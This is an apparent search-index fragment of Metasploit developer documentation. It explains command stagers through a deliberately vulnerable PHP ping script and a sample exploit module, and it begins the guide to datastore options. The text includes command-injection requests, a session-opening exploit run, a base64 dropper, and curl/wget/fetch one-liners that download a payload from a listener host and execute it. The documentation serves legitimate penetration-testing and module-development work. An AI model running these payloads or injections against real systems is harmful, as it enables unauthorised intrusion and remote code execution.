    "url": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html"
  },"301": {
    "doc": "How to use command stagers",
    "title": "The Vulnerability Test Case",
    "content": "The best way to explain how to use a command stager is probably by demonstrating it. Here we have a command injection vulnerability in example PHP code, something silly you actually might see in enterprise-level software. The bug is that you can inject additional system commands in the system call for ping: . &amp;lt;?php if ( isset($_GET[\"ip\"]) ) { $output = system(\"ping -c 1 \" . $_GET[\"ip\"]); die($output); } ?&amp;gt; &amp;lt;html&amp;gt; &amp;lt;body&amp;gt; &amp;lt;form action = \"ping.php\" method = \"GET\"&amp;gt; IP to ping: &amp;lt;input type = \"text\" name = \"ip\" /&amp;gt; &amp;lt;input type = \"submit\" /&amp;gt; &amp;lt;/form&amp;gt; &amp;lt;/body&amp;gt; &amp;lt;/html&amp;gt; . Place the above PHP script (ping.php) on an Ubuntu + Apache + PHP server. Make sure your Apache server isn’t exposed to the Internet! . Under normal usage, this is how the script behaves - it just pings the host you specify, and shows you the output: . $ curl \"http://192.168.1.203/ping.php?ip=127.0.0.1\" PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.017 ms --- 127.0.0.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.017/0.017/0.017/0.000 ms rtt min/avg/max/mdev = 0.017/0.017/0.017/0.000 ms . OK, now we can abuse that a little and execute another command (id): . $ curl \"http://192.168.1.203/ping.php?ip=127.0.0.1+%26%26+id\" PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.020 ms --- 127.0.0.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.020/0.020/0.020/0.000 ms uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data) . See the www-data? That is the output for the second command we asked the script to execute. 
By doing that, we can also do something even more nasty - like writing a Meterpreter payload onto the target system, and execute it. ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#the-vulnerability-test-case",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#the-vulnerability-test-case"
  },"302": {
    "doc": "How to use command stagers",
    "title": "The Msf::Exploit::CmdStager Mixin",
    "content": "Now let’s talk about how to use a command stager to exploit the above script. There are a couple of steps you need to do: . 1. Include the Msf::Exploit::CmdStager mixin . Although there are many flavors of mixins/stagers, you only need to include Msf::Exploit::CmdStager when writing a Metasploit exploit. The mixin is basically an interface to all command stagers: . include Msf::Exploit::CmdStager . 2. Declare your flavors . To tell Msf::Exploit::CmdStager what flavors you want, you can add the CmdStagerFlavor info in the module’s metadata. Either from the common level, or the target level. Multiple flavors are allowed. Remember that different flavors have different approaches to staging the payload for execution. Some flavors will break the payload apart and embed the payload data into multiple echo or printf commands to write it to disk; others like wget and curl execute a command to retrieve the payload via network connection. Your chosen flavor will be determined by the availability of a given command on the target system, the size of the command, the size of the payload, the ability to call out on the network, and the security posture of the target. An example of setting flavors for a specific target: . 'Targets' =&amp;gt; [ [ 'Windows', { 'Arch' =&amp;gt; [ ARCH_X86_64, ARCH_X86 ], 'Platform' =&amp;gt; 'win', 'CmdStagerFlavor' =&amp;gt; [ 'certutil', 'vbs' ] } ] ] . Or, you can pass this info to the execute_cmdstager method (see Step 4 to begin). execute_cmdstager(flavor: :vbs) . However, it is best to set the compatible list of flavors in CmdStagerFlavor, rather than hard-coding the flavor in the execute_cmdstager method call, as this allows the operator to choose a flavor from msfconsole with set CmdStager::flavor . 3. Create the execute_command method . You also must create a def execute_command(cmd, opts = {}) method in your module. This is how you define how to execute a command on the target. The parameter cmd is the command to execute. 
When writing the execute_command method, remember that a great deal of work might already be done for you. Here is an example of a web host that executes a command as part of a request: . def execute_command(cmd, _opts = {}) populate_values if @sid.nil? || @token.nil? uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php' send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri), 'cookie' => 'sid=' + @sid, 'ctype' => 'application/x-www-form-urlencoded', 'encode_params' => true, 'vars_post' => { 'token' => @token, 'text' => cmd, 'hhook' => 'exec', 'sid' => @sid } }) end . Since the command is encapsulated within a request, it will be encoded for us. When building and debugging an execute_command method that uses web requests, remember that set httptrace true will automatically display the HTTP traffic as it is sent and received. 4. Decide on the supported payloads . CmdStagers are intended to support payloads that are uploaded, saved to disk, and launched, but many of the payloads in Metasploit Framework do not need to be saved to disk; these payloads are ARCH_CMD payloads that rely on software already present on the target system like netcat, bash, python, or ssh. Whether or not the payload needs to be saved to disk changes which payloads are supported and how we launch the payload, so we must give the user the ability to pick between the two. The best way to let the user decide what kind of payload to use is by defining separate targets. Here is an example targets section from a command injection module: . 
'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp', 'RPORT' => 9000 } } ], [ 'Linux (Dropper)', { 'Platform' => 'linux', 'Arch' => [ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }, 'Type' => :linux_dropper } ], ] . The first target is the ARCH_CMD target and unix platform. This allows the user to select any payload that starts with cmd/unix. These payloads do not need to be saved to disk because they are “just” a command, rather than an executable file. As such, they can be contained and launched within a command line string. The second is ARCH_X64 and the platform is linux; this lets us choose any payload that starts with linux/x64 and includes binary ELF payloads. These payload types must be saved to disk before they can be launched, and as such, you will often see this second type of payload referred to as a ‘dropper’ because the file must be ‘dropped’ to the disk before it can be executed. In each of the targets above, we’ve selected a default payload we know will work. 4. Executing a payload . As we said earlier, the way a payload is executed depends on the payload type. By including Msf::Exploit::CmdStager you are given access to a method called execute_cmdstager. execute_cmdstager makes a list of required commands to encode, upload, save, decode, and execute your payload, then uses the execute_command method you defined earlier to run each command on the target. Unfortunately, as we just mentioned, not all payloads need to be saved to disk. In the case of a payload that does not need to be saved to disk, we only need to call execute_command. This problem of payload/method juggling sounds far worse than it is. 
Below is a quick example of how simple the exploit method will become if you have properly defined your targets as discussed in step 4: . def exploit print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end . That’s it. If the user selects an ARCH_CMD payload, we call the execute_command method on the payload because, as we said earlier, these payloads will execute within a single command. If the user has selected a dropped payload like ARCH_X64 or ARCH_X86, then we call execute_cmdstager, which figures out the series of commands necessary to save the file to disk and launch it based on the flavor and max size you set earlier. Over the years, we have also learned that these options are quite handy when calling execute_cmdstager: . | flavor - You can specify what command stager (flavor) to use from here. | delay - How much time to delay between each command execution. 0.25 is default. | linemax - Maximum number of characters per command. 2047 is default. | . Msf::Exploit::CmdStager Template . At the minimum, this is how your exploit should start when you’re using the CmdStager mixin: . class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Command Injection Using CmdStager', 'Description' => %q{ This exploits a command injection using the command stager. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r' ], 'References' => [ [ 'URL', 'http://metasploit.com' ] ], 'Platform' => 'linux', 'Targets' => [ [ 'Linux', {} ] ], 'Payload' => { 'BadChars' => \"\\x00\" }, 'CmdStagerFlavor' => [ 'printf' ], 'Privileged' => false, 'DisclosureDate' => '2016-06-10', 'DefaultTarget' => 0 ) ) end def execute_command(cmd, opts = {}) # calls some method to inject cmd to the vulnerable code. end def exploit print_status('Exploiting...') execute_cmdstager end end . As you can see, we have chosen the “printf” flavor as our command stager. We will explain more about this later, but basically it writes our payload to /tmp and executes it. Now let’s modify the execute_command method and get code execution against the test case. Based on the PoC, we know that our injection string should look like this: . 127.0.0.1+%26%26+[Malicious commands] . We do that in execute_command using HttpClient. Notice there is actually some bad character filtering involved to get the exploit working correctly, which is expected: . def filter_bad_chars(cmd) cmd.gsub(/chmod \\+x/, 'chmod 777').gsub(/;/, ' %26%26 ').gsub(/ /, '+') end def execute_command(cmd, _opts = {}) send_request_cgi( { 'method' => 'GET', 'uri' => '/ping.php', 'encode_params' => false, 'vars_get' => { 'ip' => \"127.0.0.1+%26%26+#{filter_bad_chars(cmd)}\" } } ) end def exploit print_status('Exploiting...') execute_cmdstager end . And let’s run that; we should have a shell: . msf exploit(cmdstager_demo) > run [*] Started reverse TCP handler on 10.6.0.92:4444 [*] Exploiting... [*] Transmitting intermediate stager for over-sized stage...(105 bytes) [*] Sending stage (1495599 bytes) to 10.6.0.92 [*] Meterpreter session 1 opened (10.6.0.92:4444 -> 10.6.0.92:51522) at 2016-06-10 11:51:03 -0500 . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#the-msfexploitcmdstager-mixin",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#the-msfexploitcmdstager-mixin"
  },"303": {
    "doc": "How to use command stagers",
    "title": "Flavors",
    "content": "Now that we know how to use the Msf::Exploit::CmdStager mixin, let’s take a look at the command stagers you can use. As mentioned above, there are 2 general approaches to staging an executable on disk: invoking a command that downloads the executable file to disk, like wget, curl, or fetch, or breaking the executable file into pieces and including them in the commands themselves to write it to disk, like echo, printf, or vbs. This distinction can be important: writing a stageless binary payload to disk using a stager that has to embed the chunked payload in its commands will require the execution of dozens of commands, each of which often carries the signature of the exploit. It is also useful to know that the printf flavor is the only flavor that embeds the payload into the commands but does not use echo. Available flavors: . Flavors requiring the payload to be broken apart and embedded into the commands: . | bourne | certutil | debug_asm | debug_write | echo | printf | vbs | . Flavors that rely on using a command to retrieve the payload via a network connection: . | curl | fetch | lwprequest | psh_invokewebrequest | tftp | wget | . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#flavors",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#flavors"
  },"304": {
    "doc": "How to use command stagers",
    "title": "VBS Command Stager - Windows Only",
    "content": "The VBS command stager is for Windows. It encodes our payload with Base64, saves it on the target machine, also writes a VBS script using the echo command, and then lets the VBS script decode the Base64 payload and execute it. If you are exploiting a Windows target that supports PowerShell, you might want to consider using that instead of the VBS stager, because PowerShell tends to be more stealthy. To use the VBS stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' => [ 'vbs' ] . Or set the :vbs key to execute_cmdstager: . execute_cmdstager(flavor: :vbs) . You will also need to make sure the module’s supported platforms include windows (also in the metadata), for example: . 'Platform' => 'win' . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#vbs-command-stager---windows-only",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#vbs-command-stager---windows-only"
  },"305": {
    "doc": "How to use command stagers",
    "title": "Certutil Command Stager - Windows Only",
    "content": "Certutil is a Windows command that can be used to dump and display certification authority (CA) configuration information, configure certificate services, back up and restore CA components, etc. It only comes with newer Windows systems, starting from Windows 2012 and Windows 8. The certutil flavor can be confusing: although certutil can be used to download files just like wget and ftp, we do not use it that way here; instead we use echo to write the file as a base64 encoded certificate, and then we use certutil to decode it prior to execution: . echo -----BEGIN CERTIFICATE----- > encoded.txt echo Just Base64 encode your binary data echo TVoAAA== >> encoded.txt echo -----END CERTIFICATE----- >> encoded.txt certutil -decode encoded.txt decoded.bin . To take advantage of that, the Certutil command stager saves the payload in Base64 as a fake certificate, asks certutil to decode it, and then finally executes it. To use the Certutil command stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' => [ 'certutil' ] . Or set the :certutil key to execute_cmdstager: . execute_cmdstager(flavor: :certutil) . You will also need to remember to set the platform in the metadata: . 'Platform' => 'win' . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#certutil-command-stager---windows-only",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#certutil-command-stager---windows-only"
  },"306": {
    "doc": "How to use command stagers",
    "title": "Debug_write Command Stager - Windows Only",
    "content": "The debug_write command stager is an old Windows trick to write a file to the system. In this case, we use debug.exe to write a small .NET binary; that binary takes a hex-ascii file created by the echo command, decodes it back into the binary, and finally executes it. Obviously, to be able to use this command stager, you must make sure the target is a Windows system that supports .NET. To use the debug_write command stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' => [ 'debug_write' ] . Or set the :debug_write key to execute_cmdstager: . execute_cmdstager(flavor: :debug_write) . You will also need to remember to set the platform in the metadata: . 'Platform' => 'win' . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#debug_write-command-stager---windows-only",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#debug_write-command-stager---windows-only"
  },"307": {
    "doc": "How to use command stagers",
    "title": "Debug_asm Command Stager - Windows Only",
    "content": "The debug_asm command stager is another old Windows trick used to assemble a COM file; the COM file then decodes our hex-ascii payload and executes it. To use the debug_asm command stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' => [ 'debug_asm' ] . Or set the :debug_asm key to execute_cmdstager: . execute_cmdstager(flavor: :debug_asm) . You will also need to remember to set the platform in the metadata: . 'Platform' => 'win' . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#debug_asm-command-stager---windows-only",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#debug_asm-command-stager---windows-only"
  },"308": {
    "doc": "How to use command stagers",
    "title": "TFTP Command Stager - Windows Only",
    "content": "The TFTP command stager uses tftpd.exe to download our payload, and then uses the start.exe command to execute it. This technique only works well against older versions of Windows (such as XP), because newer Windows machines no longer install tftp.exe by default. The TFTP command stager must bind to UDP port 69, so msfconsole must be started as root: . rvmsudo ./msfconsole . To use the TFTP stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' => [ 'tftp' ] . Or set the :tftp key to execute_cmdstager: . execute_cmdstager(flavor: :tftp) . You will also need to remember to set the platform in the metadata: . 'Platform' => 'win' . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#tftp-command-stager---windows-only",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#tftp-command-stager---windows-only"
  },"309": {
    "doc": "How to use command stagers",
    "title": "PowerShell Invoke-WebRequest - Windows Only",
    "content": "To use the PowerShell Invoke-WebRequest stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' => [ 'psh_invokewebrequest' ] . Or set the :psh_invokewebrequest key to execute_cmdstager: . execute_cmdstager(flavor: :psh_invokewebrequest) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#powershell-invoke-webrequest---windows-only",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#powershell-invoke-webrequest---windows-only"
  },"310": {
    "doc": "How to use command stagers",
    "title": "Bourne Command Stager - Multi Platform",
    "content": "Linemax minimum: 373 . The Bourne command stager supports multiple platforms except for Windows. Just like many other stagers, it writes a base64 encoded payload to disk, but then it tries to decode it using four different commands: base64, openssl, python, and perl. This is very useful if the target’s OS is unpredictable. You can see the way it attempts multiple decoding techniques by setting verbose to true, launching an exploit that has bourne as a supported command stager flavor, and selecting it as the flavor: . [*] Generated command stager: [\"echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXAoFh8lRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/XtMnQ.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/IPUov' < '/tmp/XtMnQ.b64' ; chmod +x '/tmp/IPUov' ; '/tmp/IPUov' ; rm -f '/tmp/IPUov' ; rm -f '/tmp/XtMnQ.b64'\"] . To use the Bourne stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' => [ 'bourne' ] . Or set the :bourne key to execute_cmdstager: . execute_cmdstager(flavor: :bourne) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#bourne-command-stager---multi-platform",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#bourne-command-stager---multi-platform"
  },"311": {
    "doc": "How to use command stagers",
    "title": "Echo Command Stager - Multi Platform",
    "content": "Linemax minimum: 26 . The echo command stager is suitable for multiple platforms except for Windows. It just echoes the payload to disk, chmods it, and executes it. An example looks similar to this: . echo -en \\\\x41\\\\x41\\\\x41\\\\x41 >> /tmp/payload ; chmod 777 /tmp/payload ; /tmp/payload ; rm -f /tmp/payload . To use the echo stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' => [ 'echo' ] . Or set the :echo key to execute_cmdstager: . execute_cmdstager(flavor: :echo) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#echo-command-stager---multi-platform",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#echo-command-stager---multi-platform"
  },"312": {
    "doc": "How to use command stagers",
    "title": "Printf Command Stager - Multi Platform",
    "content": "Linemax minimum: 25 . The printf command stager is also suitable for multiple platforms except for Windows. It just uses the printf command to write the payload to disk, chmods it, and executes it. An example looks similar to this: . printf '\\177\\177\\177\\177' >> /tmp/payload ; chmod +x /tmp/payload ; /tmp/payload ; rm -f /tmp/payload . To use the printf stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' => [ 'printf' ] . Or set the :printf key to execute_cmdstager: . execute_cmdstager(flavor: :printf) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#printf-command-stager---multi-platform",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#printf-command-stager---multi-platform"
  },"313": {
    "doc": "How to use command stagers",
    "title": "cURL Command Stager - Multi Platform",
    "content": "The cURL command stager uses the curl command on the target host to download the payload file. It requires users to specify SRVHOST and SRVPORT values, and it will start an HTTP server to host the payload file. An example looks similar to this: . curl -so /tmp/dtNGlaaL http://10.5.135.201:8080/mdkwKcdGCtU;chmod +x /tmp/dtNGlaaL;/tmp/dtNGlaaL;rm -f /tmp/dtNGlaaL . To use the cURL stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' => [ 'curl' ] . Or set the :curl key to execute_cmdstager: . execute_cmdstager(flavor: :curl) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#curl-command-stager---multi-platform",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#curl-command-stager---multi-platform"
  },"314": {
    "doc": "How to use command stagers",
    "title": "wget Command Stager - Multi Platform",
    "content": "The wget command stager is similar to the curl command stager, except that instead of using curl to download the file on the target host, it uses the wget command. It requires users to specify SRVHOST and SRVPORT values, and it will start an HTTP server to host the payload file. An example looks similar to this: . wget -qO /tmp/MZXxujch http://10.5.135.201:8080/mdkwKcdGCtU;chmod +x /tmp/MZXxujch;/tmp/MZXxujch;rm -f /tmp/MZXxujch . To use the wget stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' => [ 'wget' ] . Or set the :wget key to execute_cmdstager: . execute_cmdstager(flavor: :wget) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#wget-command-stager---multi-platform",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#wget-command-stager---multi-platform"
  },"315": {
    "doc": "How to use command stagers",
    "title": "LWP Request Command Stager - Multi Platform",
    "content": "The lwp-request command stager is similar to the curl command stager, except that instead of using curl to download the file on the target host, it uses the lwp-request command. It requires users to specify SRVHOST and SRVPORT values, and it will start an HTTP server to host the payload file. An example looks similar to this: . lwp-request -m GET http://10.5.135.201:8080/mdkwKcdGCtU > /tmp/OKOnDYwn;chmod +x /tmp/OKOnDYwn;/tmp/OKOnDYwn;rm -f /tmp/OKOnDYwn . To use the lwprequest stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' => [ 'lwprequest' ] . Or set the :lwprequest key to execute_cmdstager: . execute_cmdstager(flavor: :lwprequest) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#lwp-request-command-stager---multi-platform",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#lwp-request-command-stager---multi-platform"
  },"316": {
    "doc": "How to use command stagers",
    "title": "Fetch Command Stager - BSD Only",
    "content": "The fetch command stager is similar to the curl command stager, except that instead of using curl to download the file on the target host, it uses the fetch command. It requires users to specify SRVHOST and SRVPORT values, and it will start an HTTP server to host the payload file. An example looks similar to this: . fetch -qo /tmp/UGWuPPcy http://10.5.135.201:8080/mdkwKcdGCtU;chmod +x /tmp/UGWuPPcy;/tmp/UGWuPPcy;rm -f /tmp/UGWuPPcy . To use the fetch stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' => [ 'fetch' ] . Or set the :fetch key to execute_cmdstager: . execute_cmdstager(flavor: :fetch) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#fetch-command-stager---bsd-only",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#fetch-command-stager---bsd-only"
  },"317": {
    "doc": "How to use command stagers",
    "title": "How to use command stagers",
    "content": "If you’ve found a way to execute a command on a target, and you’d like to leverage that ability to turn command execution into a Meterpreter session, command stagers are for you. Command stagers provide an easy way to write exploits that leverage vulnerabilities such as command execution or code injection and turn them into sessions. There are currently 14 different flavors of command stagers, each of which uses a system command (or commands) to save (or not save) your payload, sometimes decode it, and execute it. The hardest part about command stagers is understanding how much they do and what they do. All you need to do for a command stager is define how the command injection works in the execute_command method and then select a few options. ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html"
  },"318": {
    "doc": "How to use datastore options",
    "title": "Datastore Option Overview",
    "content": "A datastore option is a type of variable that can be set by the user, allowing various components of Metasploit to be more configurable during use. For example, in msfconsole, you can set the ConsoleLogging option in order to log all the console input/output - something that’s kind of handy for documentation purposes during a pentest. When you load a module, there will be a lot more options registered by the mixin(s) or the module. Some common ones include RHOSTS and RPORT for a server-side exploit or auxiliary module, SRVHOST for a client-side module, etc. The best way to find out exactly what datastore options you can set is by using these commands: . | show options - Shows you all the basic options. | show advanced - Shows you all the advanced options. | show missing - Shows you all the required options you have not configured. | set - Shows you everything. Obviously, you also use this command to set an option. | . Option sources: ModuleDataStore, active_module, session, and framework . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#datastore-option-overview",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#datastore-option-overview"
  },"319": {
    "doc": "How to use datastore options",
    "title": "How users look at datastore options",
    "content": "On the user’s side, datastore options are seen as global or module-level: Global means all the modules can use that option, which can be set by using the setg command. Module-level means only that particular module you’re using remembers that datastore option, no other components will know about it. You are setting a module-level option if you load a module first, and then use the set command, like the following: . msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set rhost 10.0.1.3 rhost => 10.0.1.3 . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#how-users-look-at-datastore-options",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#how-users-look-at-datastore-options"
  },"320": {
    "doc": "How to use datastore options",
    "title": "How Metasploit developers look at datastore options",
    "content": "On the development side, things are a little crazier. Datastore options actually can be found in at least four different sources: the ModuleDataStore object, active_module, session object, or the framework object. If you’re just doing module development, the best source you can trust is the ModuleDataStore object. This object has a specific load order before handing you the option you want: if the option can be found in the module’s datastore, it will give you that. If not found, it will give you the one from framework. The following is an example of how to read a datastore option in a module: . current_host = datastore['RHOST'] . If your dev work is outside the module realm, there is a good possibility that you don’t even have the ModuleDataStore object. But in some cases, you still might be able to read from the active_module accessor from the driver. Or if you have access to ModuleCommandDispatcher, there is a mod method too that gives you the same thing, and sometimes mixins pass this around in a run_simple method while dispatching a module. One example you can look at is the Msf::Ui::Console::CommandDispatcher::Auxiliary class. In some cases such as running a script in post exploitation, you might not have ModuleDataStore or even active_module, but you should still have a session object. There should be an exploit_datastore that gives you all the datastore options: . session.exploit_datastore . If you don’t have access to the module, or to a session object, the last source is obviously the framework object, and there is ALWAYS a framework object. However, like we said earlier, if the user sets a module-level option, no other components will see it, this includes the framework object: . framework.datastore . So now you know there are multiple sources of datastore options. And hopefully at this point you are well aware that not all sources necessarily share the same thing. 
If you have to try everything, as a general rule, this should be your load order: . | Try from the ModuleDataStore | Try from active_module | Try from session | Try from framework | . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#how-metasploit-developers-look-at-datastore-options",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#how-metasploit-developers-look-at-datastore-options"
  },"321": {
    "doc": "How to use datastore options",
    "title": "Core option types",
    "content": "All core datastore option types are defined in the option_container.rb file as classes. You should always pick the most appropriate one because each has its own input validator. When you initialize an option during datastore registration, it should be in the following format: . OptSomething.new(option_name, [boolean, description, value, enums], aliases: aliases, conditions: conditions) . | option_name - The name of the datastore option. | boolean - The first attribute: true means this is a required option, false means optional. | description - A short description of this option. | value - A default value. Note that if the first attribute is false, you don’t need to provide a value; it will be set to nil automatically. | enums - (optional) An array of acceptable values, e.g. %w[ LEFT RIGHT ]. | aliases - (optional, keyword-only) An array of additional names that refer to this option. This is useful when renaming a datastore option to retain backward compatibility. See the Renaming datastore options section for more information. | conditions - (optional, keyword-only) An array describing a condition under which the option should be displayed. This can be used to hide options when they are irrelevant based on other configurations. See the Filtering datastore options section for more information. | fallbacks - (optional, keyword-only) An array of names that will be used as a fallback if the main option name is defined by the user. This is useful when you want specialised option names such as SMBUser but also want to gracefully check a list of more generic fallback option names such as Username. This functionality is currently behind a feature flag, set with features set datastore_fallbacks true in msfconsole. | . Now let’s talk about what classes are available: . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#core-option-types",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#core-option-types"
  },"322": {
    "doc": "How to use datastore options",
    "title": "OptAddress",
    "content": "An input that is an IPv4 address. Code example: . OptAddress.new('IP', [ true, 'Set an IP', '10.0.1.3' ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optaddress",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optaddress"
  },"323": {
    "doc": "How to use datastore options",
    "title": "OptAddressRange",
    "content": "An input that is a range of IPv4 addresses, for example: 10.0.1.1-10.0.1.20, or 10.0.1.1/24. You can also supply a file path instead of a range, and it will automatically treat that file as a list of IPs. Or, if you do the rand:3 syntax, with 3 meaning 3 times, it will generate 3 random IPs for you. Basic code example: . OptAddressRange.new('Range', [ true, 'Set an IP range', '10.0.1.3-10.0.1.23' ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optaddressrange",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optaddressrange"
  },"324": {
    "doc": "How to use datastore options",
    "title": "OptBool",
    "content": "Boolean option. It will validate if the input is a variant of either true or false. For example: y, yes, n, no, 0, 1, etc. Code example: . OptBool.new('BLAH', [ true, 'Set a BLAH option', false ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optbool",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optbool"
  },"325": {
    "doc": "How to use datastore options",
    "title": "OptEnum",
    "content": "Basically this will limit the input to specific choices. For example, if you want the input to be either “apple” or “orange”, and nothing else, then OptEnum is the one for you. Code example: . # Choices are: apple or orange, defaults to apple OptEnum.new('FRUIT', [ true, 'Set a fruit', 'apple', ['apple', 'orange']]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optenum",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optenum"
  },"326": {
    "doc": "How to use datastore options",
    "title": "OptInt",
    "content": "This can be either a hex or a decimal value. Code example: . OptInt.new('FILE', [ true, 'A hex or decimal', 1024 ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optint",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optint"
  },"327": {
    "doc": "How to use datastore options",
    "title": "OptPath",
    "content": "If your datastore option is asking for a local file path, then use this. OptPath.new('FILE', [ true, 'Load a local file' ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optpath",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optpath"
  },"328": {
    "doc": "How to use datastore options",
    "title": "OptPort",
